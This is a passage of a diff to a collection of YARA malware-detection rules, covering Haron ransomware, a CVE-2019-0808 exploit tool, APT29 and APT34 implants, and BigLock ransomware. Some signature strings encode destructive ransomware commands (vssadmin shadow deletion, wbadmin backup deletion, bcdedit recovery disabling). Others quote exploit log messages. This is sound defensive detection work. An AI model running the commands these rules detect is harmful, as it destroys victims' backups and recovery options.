+		$s2 = { 83 c4 08 8d 8d ?? fe ff ff e8 [2] ff ff 8d 8d ?? fe ff ff e8 [2] ff ff 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff 68 [2] 48 00 8d 8d [2] ff ff e8 [2] 00 00 8d 8d [2] ff ff 51 e8 ?? f9 ff ff 83 c4 04 88 85 2b ff ff ff 8d 8d [2] ff ff e8 [2] 00 00 0f b6 95 2b ff ff ff 85 d2 74 1e 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff 33 c0 e9 [2] 00 00 8d 4d fa e8 [2] ff ff 8d 4d fa e8 [2] 01 00 8d 4d fa e8 [2] 01 00 8d 4d fa e8 [2] 01 00 0f b6 c0 85 c0 74 0c c7 85 ?? fe ff ff [2] 48 00 eb 0a c7 85 ?? fe ff ff [2] 48 00 8b 8d ?? fe ff ff 89 8d ?? fe ff ff 8d 95 ?? fe ff ff 52 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff e8 ?? f8 ff ff 8d 4d 8c e8 [2] 00 00 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff b9 [2] 4a 00 e8 [2] ff ff 50 e8 [2] ff ff 83 c4 04 50 8d 4d 8c e8 [2] 00 00 0f b6 c0 85 c0 75 41 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff e8 ?? c6 ff ff c7 85 ?? fe ff ff 00 00 00 00 8d 4d 8c e8 [2] 00 00 8d 4d fa e8 [2] ff ff 8b 85 ?? fe ff ff e9 [2] 00 00 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff 68 [2] 48 00 8d 8d ?? fe ff ff e8 [2] 00 00 8d 8d ?? fd ff ff 51 8d 4d 8c e8 [2] 00 00 50 e8 [2] ff ff 83 c4 04 50 8d 95 ?? fe ff ff 52 b9 [2] 4a 00 e8 [2] 00 00 0f b6 c0 85 c0 75 0c c7 85 ?? fe ff ff 01 00 00 00 eb 0a c7 85 ?? fe ff ff 00 00 00 00 8a 8d ?? fe ff ff 88 8d 2a ff ff ff 8d 8d ?? fd ff ff e8 [2] 00 00 8d 8d ?? fe ff ff }
+		$s3 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 62 00 6f 00 6f 00 74 00 73 00 74 00 61 00 74 00 75 00 73 00 70 00 6f 00 6c 00 69 00 63 00 79 00 20 00 69 00 67 00 6e 00 6f 00 72 00 65 00 61 00 6c 00 6c 00 66 00 61 00 69 00 6c 00 75 00 72 00 65 00 73 }
+		$s4 = { 42 67 49 41 41 41 43 6b 41 41 42 53 55 30 45 78 }
+		$s5 = "wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest" fullword wide
+		$s6 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 72 00 65 00 63 00 6f 00 76 00 65 00 72 00 79 00 65 00 6e 00 61 00 62 00 6c 00 65 00 64 00 20 00 4e 00 6f }
+		$s7 = { 76 00 73 00 73 00 61 00 64 00 6d 00 69 00 6e 00 2e 00 65 00 78 00 65 00 20 00 44 00 65 00 6c 00 65 00 74 00 65 00 20 00 53 00 68 00 61 00 64 00 6f 00 77 00 73 00 20 00 2f 00 41 00 6c 00 6c 00 20 00 2f 00 51 00 75 00 69 00 65 00 74 }
+		$s8 = { 77 00 6d 00 69 00 63 00 2e 00 65 00 78 00 65 00 20 00 53 00 48 00 41 00 44 00 4f 00 57 00 43 00 4f 00 50 00 59 00 20 00 2f 00 6e 00 6f 00 69 00 6e 00 74 00 65 00 72 00 61 00 63 00 74 00 69 00 76 00 65 }
+		$s9 = { 77 00 62 00 61 00 64 00 6d 00 69 00 6e 00 20 00 44 00 45 00 4c 00 45 00 54 00 45 00 20 00 53 00 59 00 53 00 54 00 45 00 4d 00 53 00 54 00 41 00 54 00 45 00 42 00 41 00 43 00 4b 00 55 00 50 }
+		$s10 = { 33 c0 48 89 44 24 40 48 c7 44 24 48 07 00 00 00 66 89 44 24 30 44 8d 40 26 48 8d 15 [2] 09 00 48 8d 4c 24 30 e8 [2] ff ff 48 83 7c 24 40 00 74 42 4c 8d 44 24 30 48 83 7c 24 48 08 4c 0f 43 44 24 30 33 d2 b9 01 00 1f 00 ff 15 [2] 07 00 48 85 c0 75 1f 4c 8d 44 24 30 48 83 7c 24 48 08 4c 0f 43 44 24 30 33 d2 33 c9 ff 15 [2] 07 00 32 db eb 02 b3 01 48 8b 54 24 48 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4c 24 30 48 8b c1 48 81 fa 00 10 00 00 72 19 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 0f 87 d3 00 00 00 e8 [2] 03 00 84 db 0f 85 ad 00 00 00 e8 3e 36 00 00 84 c0 75 05 e8 c5 36 00 00 e8 ?? 94 ff ff 48 8d 1d [2] 0d 00 48 8d 4c 24 30 e8 [2] ff ff 48 8b f8 48 8d 35 [2] 0d 00 0f 1f }
+
+	condition:
+		uint16( 0 ) == 0x5A4D and filesize > 150KB and 9 of ( $s* )
+}
+rule ARKBIRD_SOLG_RAN_Haron_Aug_2021_1 : FILE
+{
+	meta:
+		description = "Detect Haron locker"
+		author = "Arkbird_SOLG"
+		id = "5900ad0e-66ca-5127-b8c2-cc23ace8929f"
+		date = "2021-08-09"
+		modified = "2021-08-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-09/RAN_Haron_Aug_2021_1.yara#L1-L22"
+		license_url = "N/A"
+		logic_hash = "5001041d9bb8acc0fa5e0e3b4cfacc5a891bed6885101ae3513b5524c91c572d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "125fdf108dc1ad6f572cbdde74b0c7fa938a9adce0cc80cb5ce00f1c030b0c93"
-		hash2 = "690c488a9902978f2ef05aa23d21f4fa30a52dd9d11191f9b49667cd08618d87"
-		hash3 = "3c5e2a4afe58634f45c48f4e800dc56bae3907dde308ff97740e9cd5684d1c53"
-		hash4 = "a9cbce007a7467ba1394eed32b9c1774ad09a9a9fb74eb2ccc584749273fac01"
+		hash1 = "66ed5384220ff3091903e14a54849f824fdd13ac70dc4e0127eb59c1de801fc2"
+		hash2 = "6e6b78a1df17d6718daa857827a2a364b7627d9bfd6672406ad72b276014209c"
 		tlp = "white"
-		adversary = "Chinese APT group"
+		adversary = "Haron"
 
 	strings:
-		$s1 = { 55 8b ec 81 ec ?? 01 00 00 a1 00 [2] 10 33 c5 89 45 [2-10] 85 ?? fe ff ff [0-1] c6 85 ?? fe ff ff 5c c6 85 ?? fe ff ff ?? c6 85 ?? fe ff ff ?? c6 85 ?? fe ff ff ?? c6 85 ?? fe ff ff }
-		$s2 = { 8b ?? ?? fe ff ff c6 ?? 00 [3-5] fe ff ff [4-10] fe ff ff }
-		$s3 = { fe ff ff 6a 40 68 00 10 00 00 8b 95 ?? fe ff ff 52 6a 00 ff 95 ?? fe ff ff 89 85 ?? fe ff ff }
+		$s1 = { 02 17 8d ?? 00 00 01 [2] 16 20 [2] 00 00 20 00 ?? 00 00 [1-5] 73 [2] 01 00 0a a2 ?? 7d ?? 01 00 0a }
+		$s2 = { 03 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 ?? 00 00 06 }
+		$s3 = { 1f 38 16 02 28 ?? 01 00 0a 16 9a 6f ?? 01 00 0a b8 28 ?? 00 00 06 13 07 7e ?? 01 00 0a 13 0b 11 07 11 0b 11 06 6e 1f 60 6a d7 88 20 00 30 00 00 1f 40 28 ?? 00 00 06 28 ?? 01 00 0a b8 13 08 11 07 02 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 ?? 00 00 06 28 ?? 01 00 0a b8 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 ?? 00 00 06 84 b8 13 09 11 07 02 7e }
+		$s4 = { 1f 18 02 28 ?? 01 00 0a 16 9a 6f ?? 01 00 0a b8 28 ?? 00 00 06 0a 7e ?? 01 00 0a 0b 06 07 28 ?? 01 00 0a 0c 08 2c 04 07 0d 2b 6f 12 04 fe 15 ?? 00 00 02 12 04 11 04 28 ?? 00 00 2b b8 7d ?? 00 00 04 06 12 04 28 ?? 00 00 06 0c 08 2c 4a 12 04 7c ?? 00 00 04 28 ?? 01 00 0a 20 ff ff ff 7f 6a fe 02 16 fe 01 13 05 11 05 2c 17 03 12 04 7b ?? 00 00 04 17 28 ?? 01 00 0a 16 fe 01 13 06 11 06 2d 0c 06 12 04 28 ?? 00 00 06 2d c2 2b 0a 12 04 7b ?? 00 00 04 0d 09 2a 07 0d 09 2a }
+		$s5 = { 28 0e 00 00 0a 0b 16 0c 38 84 01 00 00 07 08 9a 0a 06 6f ?? 01 00 0a 20 00 00 80 0c 6a 3e 66 01 00 00 06 6f 0d 00 00 0a 28 0c 00 00 0a 6f 0d 00 00 0a 28 21 00 00 0a 39 4c 01 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a 2d 01 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a 0e 01 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a ef 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a d0 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a b1 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a 92 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 76 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 5a 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 3e 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 22 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 06 06 6f 26 00 00 0a de 03 26 de 00 08 17 58 0c 08 07 8e 69 3f 73 fe ff ff 20 c4 09 00 00 28 18 00 00 0a dd 57 fe ff ff 26 dd 51 fe ff ff }
+		$s6 = { 7e ?? 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 09 00 00 06 6f [2] 00 0a 0a 06 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 09 00 00 06 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f [2] 00 0a 06 6f ?? 00 00 0a de 03 26 de 00 2a }
+		$s7 = { 28 ?? 00 00 06 0a 02 06 28 ?? 00 00 06 0b 07 6f [2] 00 0a 16 16 17 20 ff 0f 1f 00 17 14 73 [2] 00 0a 16 14 73 [2] 00 0a 6f [2] 00 0a 02 06 07 28 ?? 00 00 06 de 03 26 de 00 2a 00 00 00 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 25KB and all of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 25KB and 6 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_APT34_RDAT_July_2021_1 : FILE
+
+rule ARKBIRD_SOLG_APT_Patchwork_Tool_CVE_2019_0808_1 : FILE
 {
 	meta:
-		description = "Detect RDAT used by APT34"
+		description = "Detect CVE 2019-0808 tool used by Patchwork group"
 		author = "Arkbird_SOLG"
-		id = "136f8a9e-e680-5fab-8113-b4d33a47bc34"
-		date = "2021-07-15"
-		modified = "2021-07-16"
-		reference = "https://twitter.com/ShadowChasing1/status/1415206437806960647"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-15/APT34/APT_APT34_RDAT_July_2021_1.yara#L1-L22"
+		id = "169255fe-dd7a-5a4e-8f0f-d84a0cf5c684"
+		date = "2020-08-27"
+		modified = "2021-07-13"
+		reference = "https://blog.exodusintel.com/2019/05/17/windows-within-windows/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-27/APT_Patchwork_Tool_CVE_2019_0808_1.yar#L3-L34"
 		license_url = "N/A"
-		logic_hash = "269788430ca8faff4b0ea5ec7c2a62f99f5f48ef3bc4ea3f7a27f1d735e64819"
+		logic_hash = "e66df5d69d64c00cb68ff7bea0f7a7eec6657aff83d0f6cdb48d908bae8bcec8"
+		score = 50
+		quality = 75
+		tags = "FILE"
+		hash1 = "49f8a9203e5055777a67490923243405b9aa519016645fd75731c53cbf02073c"
+		level = "Experimental"
+
+	strings:
+		$asm1 = { 8b 3d 44 21 01 10 6a 00 6a 00 6a 01 6a 01 6a 00 6a 00 68 00 00 00 08 68 e4 7e 01 10 68 e8 7e 01 10 6a 00 ff d7 50 68 f0 7e 01 10 a3 c8 a2 01 10 e8 e8 f7 ff ff 8b 35 68 21 01 10 8d 84 24 5c 01 00 00 83 c4 08 c7 84 24 54 01 00 00 1c 00 00 00 0f 57 c0 c7 84 24 58 01 00 00 10 00 00 00 66 0f 13 84 24 60 01 00 00 66 0f 13 84 24 68 01 00 00 50 ff b4 24 1c 01 00 00 c7 84 24 64 01 00 00 00 00 00 60 ff d6 8d 84 24 54 01 00 00 50 ff 74 24 10 ff d6 8b 35 5c 21 01 10 68 04 7f 01 10 ff 74 24 10 68 10 04 00 00 ff b4 24 24 01 00 00 ff }
+		$asm2 = { a1 14 21 01 10 0f 57 c0 8b 74 24 08 89 84 24 28 01 00 00 8d 84 24 20 01 00 00 50 c7 84 24 28 01 00 00 00 00 00 00 66 0f 13 84 24 3c 01 00 00 c7 84 24 44 01 00 00 00 00 00 00 c7 84 24 50 01 00 00 00 00 00 00 c7 84 24 24 01 00 00 30 00 00 00 c7 84 24 30 01 00 00 00 00 00 00 c7 84 24 34 01 00 00 00 00 00 00 89 b4 24 38 01 00 00 c7 84 24 48 01 00 00 00 00 00 00 c7 84 24 4c 01 00 00 10 7f 01 10 ff 15 64 21 01 10 6a 00 56 6a 00 6a 00 6a 01 6a 01 6a 00 6a 00 68 00 00 00 08 68 20 7f 01 10 68 10 7f 01 10 6a 00 ff d7 6a 00 50 6a 00 6a 00 a3 ec a2 01 10 6a 00 ff b4 24 2c 01 00 00 ff 15 58 21 01 }
+		$asm3 = { e8 72 fb ff ff 83 c4 08 68 c0 13 00 10 6a fc ff 76 0c ff 15 54 21 01 10 56 ff 75 0c ff 75 08 6a 00 ff 15 24 21 01 10 5f 5e 5b 5d }
+		$s1 = "[*] Successfully exploited CVE-2019-0808 and triggered the shellcode!" fullword ascii
+		$s2 = "[!] Failed to find the address of IsMenu within user32.dll." fullword ascii
+		$s3 = "Sending hSecondaryWindow a WM_ENTERIDLE message to trigger the execution of the shellcode as SYSTEM." fullword ascii
+		$s4 = "AppPolicyGetProcessTerminationMethod" fullword ascii
+		$s5 = "[*] Found target windows!" fullword ascii
+		$s6 = "[*] addressOfIsMenuFromStartOfUser32: 0x%08X" fullword ascii
+		$s7 = "[*] FakeMenu: %p" fullword ascii
+		$s8 = "[*] Primary window address: 0x%08X" fullword ascii
+		$s9 = "[!] Didn't exploit the program. For some reason our privileges were not appropriate." fullword ascii
+		$s10 = "[*] hUser32: 0x%08X" fullword ascii
+		$s11 = "[*] Secondary window address: 0x%08X" fullword ascii
+		$s12 = "[*] Offset: 0x%08X" fullword ascii
+		$s13 = "[*] pHmValidateHandle: 0x%08X" fullword ascii
+		$s14 = "[*] HWND: %p " fullword ascii
+		$s15 = "[*] pIsMenuFunction: 0x%08X" fullword ascii
+		$s16 = "[*] Destroyed spare windows!" fullword ascii
+		$s17 = "[!] SetWindowLongA malicious error: 0x%08X" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 70KB and ( pe.imphash ( ) == "d4a5e8c255211639195793920eeda70f" and 2 of ( $asm* ) and 12 of ( $s* ) )
+}
+rule ARKBIRD_SOLG_APT_APT29_Polyglotduke_Mar_2021_1 : FILE
+{
+	meta:
+		description = "Detect PolyglotDuke implant used by APT29 group"
+		author = "Arkbird_SOLG"
+		id = "751e4f57-2c31-5cad-a794-e124b40c537b"
+		date = "2021-03-08"
+		modified = "2021-03-10"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-09/APT29/APT_APT29_PolyglotDuke_Mar_2021_1.yar#L1-L19"
+		license_url = "N/A"
+		logic_hash = "3a6d54fb266fe054886569c200f122b1e4459e0d561fe5246b623a19ec526224"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "b59dea96ef94e8d32ee1a1805174318643569bbdca0d7569ede19467ff09dcdc"
-		hash2 = "65a6afc027ff851bd325d8a4f2ab4f326dd8f2c230bfd49a213c5afc00df8e2c"
-		hash3 = "f9f6dbb09773f708b125a4cca509047eb33c8c53d9e15a8c41ae3d7a8c3e5c7c"
-		tlp = "White"
-		adversary = "APT34"
+		hash1 = "9b33ec7f5e615a6556f147b611425d3ca4a8879ce746d4a8cb62adf4c7f76029"
+		hash2 = "0c39fce5bd32b4f91a1df4f6321c2f01c017195659c7e95a235ef71ca2865aa9"
 
 	strings:
-		$s1 = { 0a 6f 70 74 20 25 6c 75 28 25 6c 75 29 20 73 74 61 74 20 25 6c 75 28 25 6c 75 29 20 73 74 6f 72 65 64 20 25 6c 75 20 6c 69 74 20 25 75 20 64 69 73 74 20 25 75 }
-		$s2 = { 0a 6c 61 73 74 5f 6c 69 74 20 25 75 2c 20 6c 61 73 74 5f 64 69 73 74 20 25 75 2c 20 69 6e 20 25 6c 64 2c 20 6f 75 74 20 7e 25 6c 64 28 25 6c 64 25 25 29 }
-		$s3 = { 70 65 6e 53 43 4d 61 6e 61 67 65 72 20 66 61 69 6c 65 64 20 28 25 64 29 0a }
-		$s4 = { 43 72 65 61 74 65 53 65 72 76 69 63 65 20 66 61 69 6c 65 64 20 28 25 64 29 0a 00 00 00 00 00 00 53 65 72 76 69 63 65 20 69 6e 73 74 61 6c 6c 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 0a }
-		$s5 = { 49 8b cd ff 15 56 22 07 00 c6 05 87 7b 0a 00 00 c7 05 81 7b 0a 00 60 ea 00 00 49 83 c9 ff 45 33 c0 48 8d 55 20 48 8d 0d f3 7b 0a 00 e8 26 a4 ff ff 49 83 c9 ff 45 33 c0 48 8d 55 00 48 8d 0d bc 7b 0a 00 e8 0f a4 ff ff 41 b8 07 00 00 00 48 8d 15 92 b8 08 00 48 8d 0d 03 7c 0a 00 e8 16 a3 ff ff 49 83 c9 ff 45 33 c0 48 8d 55 40 48 8d 0d 6c 7b 0a 00 e8 df a3 ff ff 41 b8 ?? 00 00 00 48 8d 15 6a b8 08 00 48 8d 0d 13 7c 0a 00 e8 e6 a2 ff ff 48 8d 1d 0f 7d 0a 00 48 8b c3 48 83 3d 1c 7d 0a 00 08 48 0f 43 05 fc 7c 0a 00 48 89 44 24 58 48 8d 05 a0 03 00 00 48 89 44 24 60 48 89 7c 24 68 48 89 7c 24 70 48 8d 4c 24 58 ff 15 4e 21 07 00 85 c0 75 29 48 83 3d e2 7c 0a 00 08 48 0f 43 1d c2 7c 0a 00 48 8b d3 33 c9 ff 15 37 21 07 00 48 85 c0 74 09 48 8b c8 ff 15 f1 20 07 00 83 7c 24 30 02 7f 5d 48 8d 44 24 48 48 89 44 24 28 89 7c 24 20 45 33 c9 4c 8d 05 0a 71 ff ff 33 d2 33 c9 ff 15 60 22 07 00 48 8d 44 24 50 48 89 44 24 28 89 7c 24 20 45 33 c9 4c 8d 05 a8 95 ff ff 33 d2 33 c9 ff 15 3e 22 07 00 83 ca ff 48 8b c8 ff 15 f2 20 07 00 b9 64 00 00 00 ff 15 47 22 07 }
-		$s6 = { 48 89 7d f0 48 89 7d f8 45 33 c0 33 d2 48 8d 4d e0 e8 43 a7 ff ff 41 b8 2c 00 00 00 48 8d 15 be bc 08 00 48 8d 4d e0 e8 ad a7 ff ff 48 89 7d 70 48 89 7d 78 45 33 c0 33 d2 48 8d 4d 60 e8 17 a7 ff ff 45 33 c0 48 8d 15 77 94 08 00 48 8d 4d 60 e8 84 a7 ff ff 83 7c 24 30 02 75 6e 48 8d 85 a8 00 00 00 48 89 85 a0 00 00 00 41 b8 03 00 00 00 49 8b 55 08 48 8d 8d a0 00 00 00 e8 c9 0a 00 00 48 8b 95 a0 00 00 00 48 8d 4d a0 e8 89 a5 ff ff 48 8d 85 a8 00 00 00 48 8b 8d a0 00 00 48 89 85 b0 10 00 00 48 8b da 48 8b f9 33 f6 89 74 24 78 c7 45 80 18 00 00 00 c7 45 90 01 00 00 00 48 89 75 88 45 33 c9 4c 8d 45 80 48 8d 54 24 68 48 8d 4c 24 60 ff 15 81 fe 06 00 45 33 c0 8d 56 01 48 8b 4c 24 60 ff 15 68 fe 06 00 45 33 c9 4c 8d 45 80 48 8d 54 24 70 48 8d 4c 24 58 ff 15 59 fe 06 00 45 33 c0 8d 56 01 48 8b 4c 24 58 ff 15 40 fe 06 00 33 c0 48 89 45 98 48 89 45 a0 48 89 45 a8 33 d2 44 8d 46 68 48 8d 4d c0 e8 ab 89 04 00 c7 45 c0 68 00 00 00 48 8b 44 24 68 48 89 45 20 48 8b 44 24 70 48 89 45 18 81 4d fc 00 01 00 00 48 8b d3 48 8d 4d 30 e8 bf fe ff ff 90 4c 8b c0 48 8d 8d 90 00 00 00 e8 9f 0d 00 00 90 45 33 c0 b2 01 48 8d 4d 30 e8 d0 7d ff ff 48 8d 95 90 00 00 00 48 83 bd a8 00 00 00 08 48 0f 43 95 90 00 00 00 48 8d 45 98 48 89 44 24 48 48 8d 45 c0 48 89 44 24 40 48 89 74 24 38 48 89 74 24 30 c7 44 24 28 00 00 00 08 c7 44 24 20 01 00 00 00 45 33 c9 45 33 c0 33 c9 ff 15 a7 fd 06 00 48 8b 4c 24 68 ff 15 94 fd 06 00 48 8b 4c 24 70 ff 15 89 fd 06 00 48 89 b5 80 00 00 00 48 89 b5 88 00 00 00 }
+		$seq1 = { 48 83 ec 28 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 02 ff d0 48 83 c4 28 c3 cc 48 83 ec 28 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 02 ff d0 48 83 c4 28 c3 cc 4c 8b 15 [2] 02 00 41 8b c0 4c 33 15 [2] 02 00 74 03 49 ff e2 83 e0 01 4c 8b ca 41 83 e0 02 8b d0 48 ff 25 [2] 01 00 cc cc cc 4c 8b 15 [2] 02 00 4c 33 15 [2] 02 00 74 03 49 ff e2 48 ff 25 [2] 01 00 cc cc 48 83 ec 28 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 07 48 83 c4 28 48 ff e0 b9 78 00 00 00 ff 15 [2] 01 00 32 c0 48 83 c4 28 c3 cc cc cc 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 03 48 ff e0 33 c0 c3 cc cc 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 03 48 ff e0 }
+		$seq2 = { 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 57 48 83 ec 30 33 ff 48 8b da 48 8b f1 48 85 c9 75 18 e8 69 0c 00 00 bb 16 00 00 00 89 18 e8 b1 38 00 00 8b c3 e9 a7 00 00 00 48 85 d2 74 e3 e8 a8 3f 00 00 41 bf 01 00 00 00 85 c0 75 0c ff 15 [2] 01 00 85 c0 41 0f 44 ff 83 64 24 28 00 48 83 23 00 48 83 64 24 20 00 41 83 c9 ff 4c 8b c6 33 d2 8b cf ff 15 [2] 01 00 48 63 e8 85 c0 75 11 ff 15 [2] 01 00 8b c8 e8 b2 0b 00 00 33 c0 eb 4f 48 8b cd 48 03 c9 e8 e3 07 00 00 48 89 03 48 85 c0 74 e9 41 83 c9 ff 4c 8b c6 33 d2 8b cf 89 6c 24 28 48 89 44 24 20 ff 15 [2] 01 00 85 c0 75 1b ff 15 [2] 01 00 8b c8 e8 70 0b 00 00 48 8b 0b e8 ?? f3 ff ff 48 83 23 00 eb b0 41 8b c7 48 8b 5c 24 40 48 8b 6c 24 48 48 8b 74 24 50 48 8b 7c 24 58 48 83 c4 30 41 5f c3 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 57 48 83 ec 40 33 ff 48 8b da 48 8b f1 }
+		$seq3 = { ff 25 00 00 00 00 00 00 00 00 00 00 00 00 cc }
+		$seq4 = "InitSvc" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 80KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and 3 of them
 }
-rule ARKBIRD_SOLG_RAN_Biglock_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_APT29_Miniduke_Mar_2021_1 : FILE
 {
 	meta:
-		description = "Detect BigLock ransomware"
+		description = "Detect MiniDuke implant used by APT29 group"
 		author = "Arkbird_SOLG"
-		id = "6a3fbb70-034d-5932-8c7f-de8d1b3df25c"
-		date = "2021-06-05"
-		modified = "2021-06-05"
-		reference = "https://twitter.com/fbgwls245/status/1400971422336311297"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-05/BigLock/RAN_BigLock_Jun_2021_1.yara#L1-L18"
+		id = "2faefc2f-afe3-51df-b530-50d3b3775071"
+		date = "2021-03-08"
+		modified = "2021-03-10"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-09/APT29/APT_APT29_MiniDuke_Mar_2021_1.yar#L1-L20"
 		license_url = "N/A"
-		logic_hash = "f8407f39c4acef3546f8ddc22a04fb0534c5e1fa08d552654d9b9ebdf48fed94"
+		logic_hash = "2fcbe37f9ee26a246bfc397cc907bb570a01d0f5b8e323a81aae0f6426b60435"
 		score = 50
 		quality = 75
 		tags = "FILE"
-		hash1 = "877c612cf42d85b943010437599b828383ecdf02a17e2b017367db34637e5463"
+		hash1 = "6057b19975818ff4487ee62d5341834c53ab80a507949a52422ab37c7c46b7a1"
 		level = "Experimental"
-		tlp = "White"
-		adversary = "-"
 
 	strings:
-		$s1 = { 33 d2 33 c9 44 8d 42 07 ff 15 97 20 04 00 4c 89 64 24 60 48 c7 44 24 68 07 00 00 00 66 44 89 64 24 50 41 b8 3f 00 00 00 48 8d 15 7e de 04 00 48 8d 4c 24 50 e8 24 5b ff ff 48 83 7c 24 60 00 0f 84 a0 00 00 00 0f 57 c0 33 c0 0f 11 45 90 0f 11 45 a0 0f 11 45 b0 0f 11 45 c0 0f 11 45 d0 0f 11 45 e0 48 89 45 f0 0f 11 44 24 70 48 89 45 80 48 8d 54 24 50 48 83 7c 24 68 08 48 0f 43 54 24 50 48 8d 44 24 70 48 89 44 24 48 48 8d 45 90 48 89 44 24 40 4c 89 64 24 38 4c 89 64 24 30 c7 44 24 28 00 00 00 08 c7 44 24 20 01 00 00 00 45 33 c9 45 33 c0 33 c9 ff 15 fa 1b 04 00 85 c0 74 26 ba ff ff ff ff 48 8b 4c 24 70 ff 15 b6 1c 04 00 48 8b 4c 24 78 ff 15 9b 1d 04 00 48 8b 4c 24 70 ff 15 90 1d 04 00 48 8b 54 24 68 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4c 24 50 48 8b c1 48 }
-		$s2 = { e8 4e da 01 00 4c 89 64 24 60 48 c7 44 24 68 07 00 00 00 66 44 89 64 24 50 41 b8 43 00 00 00 48 8d 15 e5 dd 04 00 48 8d 4c 24 50 e8 0b 5a ff ff 48 83 7c 24 60 00 0f 84 a0 00 00 00 0f 57 c0 33 c0 0f 11 45 90 0f 11 45 a0 0f 11 45 b0 0f 11 45 c0 0f 11 45 d0 0f 11 45 e0 48 89 45 f0 0f 11 44 24 70 48 89 45 80 48 8d 54 24 50 48 83 7c 24 68 08 48 0f 43 54 24 50 48 8d 44 24 70 48 89 44 24 48 48 8d 45 90 48 89 44 24 40 4c 89 64 24 38 4c 89 64 24 30 c7 44 24 28 00 00 00 08 c7 44 24 20 01 00 00 00 45 33 c9 45 33 c0 33 c9 ff 15 e1 1a 04 00 85 c0 74 26 ba ff ff ff ff 48 8b 4c 24 70 ff 15 9d 1b 04 00 48 8b 4c 24 78 ff 15 82 1c 04 00 48 8b 4c 24 70 ff 15 77 1c 04 00 48 8b 54 24 68 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4c 24 50 48 8b c1 48 81 fa 00 10 00 }
